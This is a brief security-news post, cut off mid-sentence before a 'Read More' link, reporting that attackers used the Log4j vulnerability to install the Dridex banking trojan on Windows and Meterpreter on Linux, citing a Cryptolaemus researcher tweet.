Dridex Malware Installed With the Help of Log4j Vulnerability

The Dridex malware is a banking trojan that was originally designed to steal victims’ online banking credentials but has since evolved into a loader that downloads various modules that can be used to perform various malicious actions, such as installing additional payloads, spreading to other devices, taking screenshots, and more.

Dridex infections have been related to ransomware attacks carried out by activities linked to the Evil Corp hacker gang.

What Happened?

Cryptolaemus, a cybersecurity research firm, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

We have verified distribution of #Dridex 22203 on Windows via #Log4j #Log4Shell. Class > MSHTA > VBS > rundll32.
Class: https://t.co/ivdZSd1QGR
Payload URLs: https://t.co/RoZubNKUs5
DLL sample: https://t.co/6P8aHdim8v
HTA > DLL run: https://t.co/KdGZfmHkMN pic.twitter.com/IsoYWfdKcq

— Cryptolaemus (@Cryptolaemus1) December 20, 2021

According to Joseph Roosen, threat actors harness the Log4j RMI (Remote Method Invocation) exploit variant to force susceptible devices to load and execute a Java class from an attacker-controlled remote server.

As explained by BleepingComputer, when the Java class is launched, it will first try to download and launch an HTA file from multiple URLs, which will install the Dridex trojan. If the Windows instructions cannot

Read More: https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/